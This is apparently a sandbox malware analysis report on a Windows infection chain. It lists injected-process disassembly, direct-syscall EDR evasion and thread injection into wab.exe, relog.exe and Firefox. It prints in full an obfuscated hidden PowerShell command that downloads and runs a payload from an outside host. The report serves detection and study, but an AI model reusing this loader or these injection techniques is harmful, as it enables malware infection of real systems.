              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBD530 mov eax, dword ptr fs:[00000030h]26_2_21CBD530
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBD530 mov eax, dword ptr fs:[00000030h]26_2_21CBD530
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3B52F mov eax, dword ptr fs:[00000030h]26_2_21D3B52F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]26_2_21C8D534
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]26_2_21C8D534
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]26_2_21C8D534
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]26_2_21C8D534
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]26_2_21C8D534
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]26_2_21C8D534
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]26_2_21C90535
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]26_2_21C90535
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]26_2_21C90535
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]26_2_21C90535
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]26_2_21C90535
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]26_2_21C90535
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D554DB mov eax, dword ptr fs:[00000030h]26_2_21D554DB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C804E5 mov ecx, dword ptr fs:[00000030h]26_2_21C804E5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7B480 mov eax, dword ptr fs:[00000030h]26_2_21C7B480
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C89486 mov eax, dword ptr fs:[00000030h]26_2_21C89486
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C89486 mov eax, dword ptr fs:[00000030h]26_2_21C89486
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C864AB mov eax, dword ptr fs:[00000030h]26_2_21C864AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB34B0 mov eax, dword ptr fs:[00000030h]26_2_21CB34B0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB44B0 mov ecx, dword ptr fs:[00000030h]26_2_21CB44B0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3F453 mov eax, dword ptr fs:[00000030h]26_2_21D3F453
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]26_2_21C8B440
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]26_2_21C8B440
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]26_2_21C8B440
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]26_2_21C8B440
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]26_2_21C8B440
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]26_2_21C8B440
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]26_2_21CBE443
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]26_2_21CBE443
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]26_2_21CBE443
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]26_2_21CBE443
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]26_2_21CBE443
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]26_2_21CBE443
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]26_2_21CBE443
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]26_2_21CBE443
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA245A mov eax, dword ptr fs:[00000030h]26_2_21CA245A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7645D mov eax, dword ptr fs:[00000030h]26_2_21C7645D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C81460 mov eax, dword ptr fs:[00000030h]26_2_21C81460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C81460 mov eax, dword ptr fs:[00000030h]26_2_21C81460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C81460 mov eax, dword ptr fs:[00000030h]26_2_21C81460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C81460 mov eax, dword ptr fs:[00000030h]26_2_21C81460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C81460 mov eax, dword ptr fs:[00000030h]26_2_21C81460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]26_2_21C9F460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]26_2_21C9F460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]26_2_21C9F460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]26_2_21C9F460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]26_2_21C9F460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]26_2_21C9F460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D5547F mov eax, dword ptr fs:[00000030h]26_2_21D5547F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0C460 mov ecx, dword ptr fs:[00000030h]26_2_21D0C460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAA470 mov eax, dword ptr fs:[00000030h]26_2_21CAA470
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAA470 mov eax, dword ptr fs:[00000030h]26_2_21CAA470
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAA470 mov eax, dword ptr fs:[00000030h]26_2_21CAA470
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D07410 mov eax, dword ptr fs:[00000030h]26_2_21D07410
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA340D mov eax, dword ptr fs:[00000030h]26_2_21CA340D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB8402 mov eax, dword ptr fs:[00000030h]26_2_21CB8402
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB8402 mov eax, dword ptr fs:[00000030h]26_2_21CB8402
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB8402 mov eax, dword ptr fs:[00000030h]26_2_21CB8402
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7C427 mov eax, dword ptr fs:[00000030h]26_2_21C7C427
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7E420 mov eax, dword ptr fs:[00000030h]26_2_21C7E420
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7E420 mov eax, dword ptr fs:[00000030h]26_2_21C7E420
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7E420 mov eax, dword ptr fs:[00000030h]26_2_21C7E420
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C857C0 mov eax, dword ptr fs:[00000030h]26_2_21C857C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C857C0 mov eax, dword ptr fs:[00000030h]26_2_21C857C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C857C0 mov eax, dword ptr fs:[00000030h]26_2_21C857C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D007C3 mov eax, dword ptr fs:[00000030h]26_2_21D007C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C817EC mov eax, dword ptr fs:[00000030h]26_2_21C817EC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C817EC mov eax, dword ptr fs:[00000030h]26_2_21C817EC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C817EC mov eax, dword ptr fs:[00000030h]26_2_21C817EC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA27ED mov eax, dword ptr fs:[00000030h]26_2_21CA27ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA27ED mov eax, dword ptr fs:[00000030h]26_2_21CA27ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA27ED mov eax, dword ptr fs:[00000030h]26_2_21CA27ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0E7E1 mov eax, dword ptr fs:[00000030h]26_2_21D0E7E1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C847FB mov eax, dword ptr fs:[00000030h]26_2_21C847FB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C847FB mov eax, dword ptr fs:[00000030h]26_2_21C847FB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3F78A mov eax, dword ptr fs:[00000030h]26_2_21D3F78A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D537B6 mov eax, dword ptr fs:[00000030h]26_2_21D537B6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C807AF mov eax, dword ptr fs:[00000030h]26_2_21C807AF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D097A9 mov eax, dword ptr fs:[00000030h]26_2_21D097A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAD7B0 mov eax, dword ptr fs:[00000030h]26_2_21CAD7B0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]26_2_21C7F7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]26_2_21C7F7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]26_2_21C7F7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]26_2_21C7F7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]26_2_21C7F7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]26_2_21C7F7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]26_2_21C7F7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]26_2_21C7F7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]26_2_21C7F7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0F7AF mov eax, dword ptr fs:[00000030h]26_2_21D0F7AF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0F7AF mov eax, dword ptr fs:[00000030h]26_2_21D0F7AF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0F7AF mov eax, dword ptr fs:[00000030h]26_2_21D0F7AF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0F7AF mov eax, dword ptr fs:[00000030h]26_2_21D0F7AF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0F7AF mov eax, dword ptr fs:[00000030h]26_2_21D0F7AF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D04755 mov eax, dword ptr fs:[00000030h]26_2_21D04755
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB674D mov esi, dword ptr fs:[00000030h]26_2_21CB674D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB674D mov eax, dword ptr fs:[00000030h]26_2_21CB674D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB674D mov eax, dword ptr fs:[00000030h]26_2_21CB674D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C93740 mov eax, dword ptr fs:[00000030h]26_2_21C93740
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C93740 mov eax, dword ptr fs:[00000030h]26_2_21C93740
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C93740 mov eax, dword ptr fs:[00000030h]26_2_21C93740
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0E75D mov eax, dword ptr fs:[00000030h]26_2_21D0E75D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C80750 mov eax, dword ptr fs:[00000030h]26_2_21C80750
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D53749 mov eax, dword ptr fs:[00000030h]26_2_21D53749
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2750 mov eax, dword ptr fs:[00000030h]26_2_21CC2750
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2750 mov eax, dword ptr fs:[00000030h]26_2_21CC2750
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7B765 mov eax, dword ptr fs:[00000030h]26_2_21C7B765
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7B765 mov eax, dword ptr fs:[00000030h]26_2_21C7B765
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7B765 mov eax, dword ptr fs:[00000030h]26_2_21C7B765
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_23D7724E GetProcessHeap,10_2_23D7724E
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_23D72B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_23D72B1C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_23D72639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_23D72639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_23D760E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_23D760E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_7616.amsi.csv, type: OTHER
              Source: Yara matchFile source: amsi32_5288.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7616, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7860, type: MEMORYSTR
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtWriteVirtualMemory: Direct from: 0x76F0490C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtClose: Direct from: 0x76F02B6C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtReadVirtualMemory: Direct from: 0x76F02E8C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtCreateKey: Direct from: 0x76F02C6C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtSetInformationThread: Direct from: 0x76F02B4C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtQueryAttributesFile: Direct from: 0x76F02E6C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtAllocateVirtualMemory: Direct from: 0x76F048EC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtQuerySystemInformation: Direct from: 0x76F048CC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtOpenSection: Direct from: 0x76F02E0C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtSetInformationThread: Direct from: 0x76EF63F9
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtDeviceIoControlFile: Direct from: 0x76F02AEC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtAllocateVirtualMemory: Direct from: 0x76F02BEC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtCreateFile: Direct from: 0x76F02FEC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtOpenFile: Direct from: 0x76F02DCC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtQueryInformationToken: Direct from: 0x76F02CAC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtTerminateThread: Direct from: 0x76EF7B2E
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtOpenKeyEx: Direct from: 0x76F02B9C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtProtectVirtualMemory: Direct from: 0x76F02F9C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtSetInformationProcess: Direct from: 0x76F02C5C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtTerminateProcess: Direct from: 0x76F02D5C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtNotifyChangeKey: Direct from: 0x76F03C2C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtCreateMutant: Direct from: 0x76F035CC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtWriteVirtualMemory: Direct from: 0x76F02E3C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtMapViewOfSection: Direct from: 0x76F02D1C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtResumeThread: Direct from: 0x76F036AC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtReadFile: Direct from: 0x76F02ADC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtQuerySystemInformation: Direct from: 0x76F02DFC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtDelayExecution: Direct from: 0x76F02DDC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtQueryInformationProcess: Direct from: 0x76F02C26
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtResumeThread: Direct from: 0x76F02FBC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeNtCreateUserProcess: Direct from: 0x76F0371C
              Maps a DLL or memory area into another process
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe protection: execute and read and write
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Windows\SysWOW64\relog.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: NULL target: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe protection: read write
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: NULL target: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Windows\SysWOW64\relog.exeThread register set: target process: 3408
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\relog.exeThread APC queued: target process: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3FA0000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 73FD94Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3280000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 327FF8C
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU 